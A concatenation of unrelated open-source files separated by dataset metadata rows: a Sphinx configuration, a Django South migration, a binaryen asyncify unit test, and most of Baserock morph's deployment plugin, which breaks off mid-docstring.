#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'tippet'
copyright = u'2014, Jerry Baker'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3'
# The full version, including alpha/beta/rc tags.
release = '0.3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'tippetdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'tippet.tex', u'tippet Documentation',
u'Jerry Baker', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tippet', u'tippet Documentation',
[u'Jerry Baker'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'tippet', u'tippet Documentation',
u'Jerry Baker', 'tippet', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| apache-2.0 | 3,177,837,327,602,973,700 | 30.311538 | 79 | 0.706301 | false |
elegion/djangodash2012 | fortuitus/fcore/migrations/0003_auto__add_unique_company_slug__add_unique_company_name.py | 1 | 4714 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'Company', fields ['slug']
db.create_unique('fcore_company', ['slug'])
# Adding unique constraint on 'Company', fields ['name']
db.create_unique('fcore_company', ['name'])
def backwards(self, orm):
# Removing unique constraint on 'Company', fields ['name']
db.delete_unique('fcore_company', ['name'])
# Removing unique constraint on 'Company', fields ['slug']
db.delete_unique('fcore_company', ['slug'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'fcore.company': {
'Meta': {'object_name': 'Company'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '50', 'populate_from': 'None', 'unique_with': '()'})
},
'fcore.fortuitusprofile': {
'Meta': {'object_name': 'FortuitusProfile'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['fcore.Company']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['fcore'] | mit | 963,338,552,639,445,400 | 60.233766 | 182 | 0.554518 | false |
WebAssembly/binaryen | test/unit/test_asyncify.py | 2 | 4247 | import os
import subprocess
import tempfile
from scripts.test import shared
from . import utils
class AsyncifyTest(utils.BinaryenTestCase):
def test_asyncify_js(self):
def test(args):
print(args)
shared.run_process(shared.WASM_OPT + args + [self.input_path('asyncify-sleep.wat'), '--asyncify', '-o', 'a.wasm'])
shared.run_process(shared.WASM_OPT + args + [self.input_path('asyncify-coroutine.wat'), '--asyncify', '-o', 'b.wasm'])
shared.run_process(shared.WASM_OPT + args + [self.input_path('asyncify-stackOverflow.wat'), '--asyncify', '-o', 'c.wasm'])
print(' file size: %d' % os.path.getsize('a.wasm'))
if shared.NODEJS:
shared.run_process([shared.NODEJS, self.input_path('asyncify.js')])
test(['-g'])
test([])
test(['-O1'])
test(['--optimize-level=1'])
test(['-O3'])
test(['-Os', '-g'])
def test_asyncify_pure_wasm(self):
def test(input_file):
shared.run_process(shared.WASM_OPT + [input_file, '--asyncify', '-o', 'a.wasm'])
shared.run_process(shared.WASM_DIS + ['a.wasm', '-o', 'a.wat'])
output = shared.run_process(shared.WASM_SHELL + ['a.wat'], capture_output=True).stdout
with open(self.input_path('asyncify-pure.txt'), 'r') as f:
self.assert_equal_ignoring_line_endings(f.read(), output)
# test wat input
wat = self.input_path('asyncify-pure.wat')
test(wat)
# test wasm input
shared.run_process(shared.WASM_AS + [wat, '-o', 'a.wasm'])
test('a.wasm')
def test_asyncify_list_bad(self):
for arg, warning in [
('--pass-arg=asyncify-removelist@nonexistent', 'nonexistent'),
('--pass-arg=asyncify-onlylist@nonexistent', 'nonexistent'),
('--pass-arg=asyncify-removelist@main', None),
('--pass-arg=asyncify-onlylist@main', None),
('--pass-arg=asyncify-removelist@m*n', None),
('--pass-arg=asyncify-onlylist@m*n', None),
('--pass-arg=asyncify-onlylist@main*', None),
('--pass-arg=asyncify-onlylist@*main', None),
('--pass-arg=asyncify-removelist@non*existent', 'non*existent'),
('--pass-arg=asyncify-onlylist@non*existent', 'non*existent'),
('--pass-arg=asyncify-onlylist@DOS_ReadFile(unsigned short, unsigned char*, unsigned short*, bool)', None),
]:
print(arg, warning)
err = shared.run_process(shared.WASM_OPT + ['-q', self.input_path('asyncify-pure.wat'), '--asyncify', arg], stdout=subprocess.PIPE, stderr=subprocess.PIPE).stderr.strip()
if warning:
self.assertIn('warning', err)
self.assertIn(warning, err)
else:
self.assertNotIn('warning', err)
def test_asyncify_onlylist_and_other(self):
def test(list_name):
args = shared.WASM_OPT + [self.input_path('asyncify-pure.wat'),
'--asyncify',
'--pass-arg=asyncify-onlylist@main',
'--pass-arg=asyncify-%slist@main' % list_name]
proc = shared.run_process(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, check=False)
self.assertNotEqual(proc.returncode, 0, 'must error on using both lists at once')
self.assertIn('It makes no sense to use both an asyncify only-list together with another list', proc.stdout)
test('remove')
test('add')
def test_asyncify_imports(self):
def test(args):
return shared.run_process(shared.WASM_OPT + [self.input_path('asyncify-sleep.wat'), '--asyncify', '--print'] + args, stdout=subprocess.PIPE).stdout
normal = test(['[email protected]'])
temp = tempfile.NamedTemporaryFile().name
with open(temp, 'w') as f:
f.write('env.sleep')
response = test(['--pass-arg=asyncify-imports@@%s' % temp])
self.assertEqual(normal, response)
without = test(['[email protected]'])
self.assertNotEqual(normal, without)
| apache-2.0 | -1,870,686,835,276,587,000 | 46.719101 | 182 | 0.5757 | false |
nuxeh/morph | morphlib/plugins/deploy_plugin.py | 1 | 29928 | # Copyright (C) 2013-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import logging
import os
import shutil
import sys
import tarfile
import tempfile
import uuid
import cliapp
import morphlib
class DeployPlugin(cliapp.Plugin):
def enable(self):
group_deploy = 'Deploy Options'
self.app.settings.boolean(['upgrade'],
'specify that you want to upgrade an '
'existing cluster. Deprecated: use the '
'`morph upgrade` command instead',
group=group_deploy)
self.app.add_subcommand(
'deploy', self.deploy,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
self.app.add_subcommand(
'upgrade', self.upgrade,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
def disable(self):
pass
def deploy(self, args):
'''Deploy a built system image or a set of images.
Command line arguments:
* `CLUSTER` is the name of the cluster to deploy.
* `DEPLOYMENT...` is the name of zero or more deployments in the
morphology to deploy. If none are specified then all deployments
in the morphology are deployed.
* `SYSTEM.KEY=VALUE` can be used to assign `VALUE` to a parameter
named `KEY` for the system identified by `SYSTEM` in the cluster
morphology (see below). This will override parameters defined
in the morphology.
Morph deploys a set of systems listed in a cluster morphology.
"Deployment" here is quite a general concept: it covers anything
where a system image is taken, configured, and then put somewhere
where it can be run. The deployment mechanism is quite flexible,
and can be extended by the user.
A cluster morphology defines a list of systems to deploy, and
for each system a list of ways to deploy them. It contains the
following fields:
* **name**: MUST be the same as the basename of the morphology
filename, sans .morph suffix.
* **kind**: MUST be `cluster`.
* **systems**: a list of systems to deploy;
the value is a list of mappings, where each mapping has the
following keys:
* **morph**: the system morphology to use in the specified
commit.
* **deploy**: a mapping where each key identifies a
system and each system has at least the following keys:
* **type**: identifies the type of development e.g. (kvm,
nfsboot) (see below).
* **location**: where the deployed system should end up
at. The syntax depends on the deployment type (see below).
Any additional item on the dictionary will be added to the
environment as `KEY=VALUE`.
* **deploy-defaults**: allows multiple deployments of the same
system to share some settings, when they can. Default settings
will be overridden by those defined inside the deploy mapping.
# Example
name: cluster-foo
kind: cluster
systems:
- morph: devel-system-x86_64-generic.morph
deploy:
cluster-foo-x86_64-1:
type: kvm
location: kvm+ssh://user@host/x86_64-1/x86_64-1.img
HOSTNAME: cluster-foo-x86_64-1
DISK_SIZE: 4G
RAM_SIZE: 4G
VCPUS: 2
- morph: devel-system-armv7-highbank
deploy-defaults:
type: nfsboot
location: cluster-foo-nfsboot-server
deploy:
cluster-foo-armv7-1:
HOSTNAME: cluster-foo-armv7-1
cluster-foo-armv7-2:
HOSTNAME: cluster-foo-armv7-2
Each system defined in a cluster morphology can be deployed in
multiple ways (`type` in a cluster morphology). Morph provides
the following types of deployment:
* `tar` where Morph builds a tar archive of the root file system.
* `rawdisk` where Morph builds a raw disk image and sets up the
image with a bootloader and configuration so that it can be
booted. Disk size is set with `DISK_SIZE` (see below).
* `virtualbox-ssh` where Morph creates a VirtualBox disk image,
and creates a new virtual machine on a remote host, accessed
over ssh. Disk and RAM size are set with `DISK_SIZE` and
`RAM_SIZE` (see below).
* `kvm`, which is similar to `virtualbox-ssh`, but uses libvirt
and KVM instead of VirtualBox. Disk and RAM size are set with
`DISK_SIZE` and `RAM_SIZE` (see below).
* `nfsboot` where Morph creates a system to be booted over
a network.
* `ssh-rsync` where Morph copies a binary delta over to the target
system and arranges for it to be bootable. This requires
`system-version-manager` from the tbdiff chunk
* `initramfs`, where Morph turns the system into an initramfs image,
suitable for being used as the early userland environment for a
system to be able to locate more complicated storage for its root
file-system, or on its own for diskless deployments.
There are additional extensions that currently live in the Baserock
definitions repo (baserock:baserock/definitions). These include:
* `image-package` where Morph creates a tarball that includes scripts
that can be used to make disk images outside of a Baserock
environment. The example in definitions.git will create scripts for
generating disk images and installing to existing disks.
* `sdk` where Morph generates something resembing a BitBake SDK, which
provides a toolchain for building software to target a system built
by Baserock, from outside of a Baserock environment. This creates a
self-extracting shell archive which you pass a directory to extract
to, and inside that has a shell snippet called
environment-setup-$TARGET which can be used to set environment
variables to use the toolchain.
* `pxeboot` where Morph temporarily network-boots the system you are
deploying, so it can install a more permanent system onto local
storage.
In addition to the deployment type, the user must also give
a value for `location`. Its syntax depends on the deployment
types. The deployment types provided by Morph use the
following syntaxes:
* `tar`: pathname to the tar archive to be created; for
example, `/home/alice/testsystem.tar`
* `rawdisk`: pathname to the disk image to be created; for
example, `/home/alice/testsystem.img`
* `virtualbox-ssh` and `kvm`: a custom URL scheme that
provides the target host machine (the one that runs
VirtualBox or `kvm`), the name of the new virtual machine,
and the location on the target host of the virtual disk
file. The target host is accessed over ssh. For example,
`vbox+ssh://[email protected]/testsys/home/alice/testsys.vdi`
or `kvm+ssh://[email protected]/testsys/home/alice/testys.img`
where
* `[email protected]` is the target as given to ssh,
**from within the development host** (which may be
different from the target host's normal address);
* `testsys` is the new VM's name;
* `/home/alice/testsys.vdi` and `/home/alice/testys.img` are
the pathnames of the disk image files on the target host.
* `nfsboot`: the address of the nfsboot server. (Note this is just
the _address_ of the trove, _not_ `user@...`, since `root@` will
automatically be prepended to the server address.)
In addition to the `location`parameter, deployments can take additional
`KEY=VALUE` parameters. These can be provided in the following ways:
1. In the cluster definition file, e.g.
...
systems:
- morph: systems/foo-system.morph
deploy:
foo:
HOSTNAME: foo
2. In the environment before running e.g.
`HOSTNAME=foo morph deploy ...`
3. On the command-line e.g.
`morph deploy clusters/foo.morph foo.HOSTNAME=foo`
For any boolean `KEY=VALUE` parameters, allowed values are:
+ve `yes`, `1`, `true`;
-ve `no`, `0`, `false`;
The following `KEY=VALUE` parameters are supported for `rawdisk`,
`virtualbox-ssh` and `kvm` and deployment types:
* `DISK_SIZE=X` to set the size of the disk image. `X` should use a
suffix of `K`, `M`, or `G` (in upper or lower case) to indicate
kilo-, mega-, or gigabytes. For example, `DISK_SIZE=100G` would
create a 100 gigabyte disk image. **This parameter is mandatory**.
The `kvm` and `virtualbox-ssh` deployment types support an additional
parameter:
* `RAM_SIZE=X` to set the size of virtual RAM for the virtual
machine. `X` is interpreted in the same was as `DISK_SIZE`,
and defaults to `1G`.
* `AUTOSTART=<VALUE>` - allowed values are `yes` and `no`
(default)
For the `nfsboot` write extension,
* the following `KEY=VALUE` pairs are mandatory
* `NFSBOOT_CONFIGURE=yes` (or any non-empty value). This
enables the `nfsboot` configuration extension (see
below) which MUST be used when using the `nfsboot`
write extension.
* `HOSTNAME=<STRING>` a unique identifier for that system's
`nfs` root when it's deployed on the nfsboot server - the
extension creates a directory with that name for the `nfs`
root, and stores kernels by that name for the tftp server.
* the following `KEY=VALUE` pairs are optional
* `VERSION_LABEL=<STRING>` - set the name of the system
version being deployed, when upgrading. Defaults to
"factory".
Each deployment type is implemented by a **write extension**. The
ones provided by Morph are listed above, but users may also
create their own by adding them in the same git repository
and branch as the system morphology. A write extension is a
script that does whatever is needed for the deployment. A write
extension is passed two command line parameters: the name of an
unpacked directory tree that contains the system files (after
configuration, see below), and the `location` parameter.
Regardless of the type of deployment, the image may be
configured for a specific deployment by using **configuration
extensions**. The extensions are listed in the system morphology
file:
...
configuration-extensions:
- set-hostname
The above specifies that the extension `set-hostname` is to
be run. Morph will run all the configuration extensions listed
in the system morphology, and no others. (This way, configuration
is more easily tracked in git.)
Configuration extensions are scripts that get the unpacked
directory tree of the system as their parameter, and do whatever
is needed to configure the tree.
Morph provides the following configuration extension built in:
* `set-hostname` sets the hostname of the system to the value
of the `HOSTNAME` variable.
* `nfsboot` configures the system for nfsbooting. This MUST
be used when deploying with the `nfsboot` write extension.
Any `KEY=VALUE` parameters given in `deploy` or `deploy-defaults`
sections of the cluster morphology, or given through the command line
are set as environment variables when either the configuration or the
write extension runs (except `type` and `location`).
Deployment configuration is stored in the deployed system as
/baserock/deployment.meta. THIS CONTAINS ALL ENVIRONMENT VARIABLES SET
DURING DEPLOYMENT, so make sure you have no sensitive information in
your environment that is being leaked. As a special case, any
environment/deployment variable that contains 'PASSWORD' in its name is
stripped out and not stored in the final system.
'''
# Nasty hack to allow deploying things of a different architecture
def validate(self, root_artifact):
pass
morphlib.buildcommand.BuildCommand._validate_architecture = validate
if not args:
raise cliapp.AppException(
'Too few arguments to deploy command (see help)')
# Raise an exception if there is not enough space in tempdir
# / for the path and 0 for the minimum size is a no-op
# it exists because it is complicated to check the available
# disk space given dirs may be on the same device
morphlib.util.check_disk_available(
self.app.settings['tempdir'],
self.app.settings['tempdir-min-space'],
'/', 0)
ws = morphlib.workspace.open('.')
sb = morphlib.sysbranchdir.open_from_within('.')
cluster_filename = morphlib.util.sanitise_morphology_path(args[0])
cluster_filename = sb.relative_to_root_repo(cluster_filename)
build_uuid = uuid.uuid4().hex
build_command = morphlib.buildcommand.BuildCommand(self.app)
build_command = self.app.hookmgr.call('new-build-command',
build_command)
loader = morphlib.morphloader.MorphologyLoader()
name = morphlib.git.get_user_name(self.app.runcmd)
email = morphlib.git.get_user_email(self.app.runcmd)
build_ref_prefix = self.app.settings['build-ref-prefix']
root_repo_dir = morphlib.gitdir.GitDirectory(
sb.get_git_directory_name(sb.root_repository_url))
cluster_text = root_repo_dir.read_file(cluster_filename)
cluster_morphology = loader.load_from_string(cluster_text,
filename=cluster_filename)
if cluster_morphology['kind'] != 'cluster':
raise cliapp.AppException(
"Error: morph deployment commands are only supported for "
"cluster morphologies.")
# parse the rest of the args
all_subsystems = set()
all_deployments = set()
deployments = set()
for system in cluster_morphology['systems']:
all_deployments.update(system['deploy'].iterkeys())
if 'subsystems' in system:
all_subsystems.update(loader._get_subsystem_names(system))
for item in args[1:]:
if not item in all_deployments:
break
deployments.add(item)
env_vars = args[len(deployments) + 1:]
self.validate_deployment_options(
env_vars, all_deployments, all_subsystems)
if self.app.settings['local-changes'] == 'include':
bb = morphlib.buildbranch.BuildBranch(sb, build_ref_prefix)
pbb = morphlib.buildbranch.pushed_build_branch(
bb, loader=loader, changes_need_pushing=False,
name=name, email=email, build_uuid=build_uuid,
status=self.app.status)
with pbb as (repo, commit, original_ref):
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
else:
repo = sb.get_config('branch.root')
ref = sb.get_config('branch.name')
commit = root_repo_dir.resolve_ref_to_commit(ref)
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
self.app.status(msg='Finished deployment')
def validate_deployment_options(
self, env_vars, all_deployments, all_subsystems):
for var in env_vars:
for subsystem in all_subsystems:
if subsystem == var:
raise cliapp.AppException(
'Cannot directly deploy subsystems. Create a top '
'level deployment for the subsystem %s instead.' %
subsystem)
if (not any(deployment in var
for deployment in all_deployments)
and not subsystem in var):
raise cliapp.AppException(
'Variable referenced a non-existent deployment '
'name: %s' % var)
def deploy_cluster(self, build_command, cluster_morphology, root_repo_dir,
repo, commit, env_vars, deployments):
# Create a tempdir for this deployment to work in
deploy_tempdir = tempfile.mkdtemp(
dir=os.path.join(self.app.settings['tempdir'], 'deployments'))
try:
for system in cluster_morphology['systems']:
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, repo, commit, system,
env_vars, deployments,
parent_location='')
finally:
shutil.rmtree(deploy_tempdir)
def deploy_system(self, build_command, deploy_tempdir,
root_repo_dir, build_repo, ref, system, env_vars,
deployment_filter, parent_location):
sys_ids = set(system['deploy'].iterkeys())
if deployment_filter and not \
any(sys_id in deployment_filter for sys_id in sys_ids):
return
old_status_prefix = self.app.status_prefix
system_status_prefix = '%s[%s]' % (old_status_prefix, system['morph'])
self.app.status_prefix = system_status_prefix
try:
# Find the artifact to build
morph = morphlib.util.sanitise_morphology_path(system['morph'])
srcpool = build_command.create_source_pool(build_repo, ref, morph)
artifact = build_command.resolve_artifacts(srcpool)
deploy_defaults = system.get('deploy-defaults', {})
for system_id, deploy_params in system['deploy'].iteritems():
if not system_id in deployment_filter and deployment_filter:
continue
deployment_status_prefix = '%s[%s]' % (
system_status_prefix, system_id)
self.app.status_prefix = deployment_status_prefix
try:
user_env = morphlib.util.parse_environment_pairs(
os.environ,
[pair[len(system_id)+1:]
for pair in env_vars
if pair.startswith(system_id)])
final_env = dict(deploy_defaults.items() +
deploy_params.items() +
user_env.items())
is_upgrade = ('yes' if self.app.settings['upgrade']
else 'no')
final_env['UPGRADE'] = is_upgrade
deployment_type = final_env.pop('type', None)
if not deployment_type:
raise morphlib.Error('"type" is undefined '
'for system "%s"' % system_id)
location = final_env.pop('location', None)
if not location:
raise morphlib.Error('"location" is undefined '
'for system "%s"' % system_id)
morphlib.util.sanitize_environment(final_env)
self.check_deploy(root_repo_dir, ref, deployment_type,
location, final_env)
system_tree = self.setup_deploy(build_command,
deploy_tempdir,
root_repo_dir,
ref, artifact,
deployment_type,
location, final_env)
for subsystem in system.get('subsystems', []):
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, build_repo,
ref, subsystem, env_vars, [],
parent_location=system_tree)
if parent_location:
deploy_location = os.path.join(parent_location,
location.lstrip('/'))
else:
deploy_location = location
self.run_deploy_commands(deploy_tempdir, final_env,
artifact, root_repo_dir,
ref, deployment_type,
system_tree, deploy_location)
finally:
self.app.status_prefix = system_status_prefix
finally:
self.app.status_prefix = old_status_prefix
def upgrade(self, args):
'''Upgrade an existing set of instances using built images.
See `morph help deploy` for documentation.
'''
if not args:
raise cliapp.AppException(
'Too few arguments to upgrade command (see `morph help '
'deploy`)')
if self.app.settings['upgrade']:
raise cliapp.AppException(
'Running `morph upgrade --upgrade` does not make sense.')
self.app.settings['upgrade'] = True
self.deploy(args)
def check_deploy(self, root_repo_dir, ref, deployment_type, location, env):
# Run optional write check extension. These are separate from the write
# extension because it may be several minutes before the write
# extension itself has the chance to raise an error.
try:
self._run_extension(
root_repo_dir, deployment_type, '.check',
[location], env)
except morphlib.extensions.ExtensionNotFoundError:
pass
def setup_deploy(self, build_command, deploy_tempdir, root_repo_dir, ref,
artifact, deployment_type, location, env):
# deployment_type, location and env are only used for saving metadata
# Create a tempdir to extract the rootfs in
system_tree = tempfile.mkdtemp(dir=deploy_tempdir)
try:
# Unpack the artifact (tarball) to a temporary directory.
self.app.status(msg='Unpacking system for configuration')
if build_command.lac.has(artifact):
f = build_command.lac.get(artifact)
elif build_command.rac.has(artifact):
build_command.cache_artifacts_locally([artifact])
f = build_command.lac.get(artifact)
else:
raise cliapp.AppException('Deployment failed as system is'
' not yet built.\nPlease ensure'
' the system is built before'
' deployment.')
tf = tarfile.open(fileobj=f)
tf.extractall(path=system_tree)
self.app.status(
msg='System unpacked at %(system_tree)s',
system_tree=system_tree)
self.app.status(
msg='Writing deployment metadata file')
metadata = self.create_metadata(
artifact, root_repo_dir, deployment_type, location, env)
metadata_path = os.path.join(
system_tree, 'baserock', 'deployment.meta')
with morphlib.savefile.SaveFile(metadata_path, 'w') as f:
json.dump(metadata, f, indent=4,
sort_keys=True, encoding='unicode-escape')
return system_tree
except Exception:
shutil.rmtree(system_tree)
raise
def run_deploy_commands(self, deploy_tempdir, env, artifact, root_repo_dir,
ref, deployment_type, system_tree, location):
# Extensions get a private tempdir so we can more easily clean
# up any files an extension left behind
deploy_private_tempdir = tempfile.mkdtemp(dir=deploy_tempdir)
env['TMPDIR'] = deploy_private_tempdir
try:
# Run configuration extensions.
self.app.status(msg='Configure system')
names = artifact.source.morphology['configuration-extensions']
for name in names:
self._run_extension(
root_repo_dir,
name,
'.configure',
[system_tree],
env)
# Run write extension.
self.app.status(msg='Writing to device')
self._run_extension(
root_repo_dir,
deployment_type,
'.write',
[system_tree, location],
env)
finally:
# Cleanup.
self.app.status(msg='Cleaning up')
shutil.rmtree(deploy_private_tempdir)
def _report_extension_stdout(self, line):
self.app.status(msg=line.replace('%s', '%%'))
def _report_extension_stderr(self, error_list):
def cb(line):
error_list.append(line)
sys.stderr.write('%s\n' % line)
return cb
def _report_extension_logger(self, name, kind):
return lambda line: logging.debug('%s%s: %s', name, kind, line)
def _run_extension(self, gd, name, kind, args, env):
'''Run an extension.
The ``kind`` should be either ``.configure`` or ``.write``,
depending on the kind of extension that is sought.
The extension is found either in the git repository of the
system morphology (repo, ref), or with the Morph code.
'''
error_list = []
with morphlib.extensions.get_extension_filename(name, kind) as fn:
ext = morphlib.extensions.ExtensionSubprocess(
report_stdout=self._report_extension_stdout,
report_stderr=self._report_extension_stderr(error_list),
report_logger=self._report_extension_logger(name, kind),
)
returncode = ext.run(fn, args, env=env, cwd=gd.dirname)
if returncode == 0:
logging.info('%s%s succeeded', name, kind)
else:
message = '%s%s failed with code %s: %s' % (
name, kind, returncode, '\n'.join(error_list))
raise cliapp.AppException(message)
def create_metadata(self, system_artifact, root_repo_dir, deployment_type,
location, env):
'''Deployment-specific metadata.
The `build` and `deploy` operations must be from the same ref, so full
info on the root repo that the system came from is in
/baserock/${system_artifact}.meta and is not duplicated here. We do
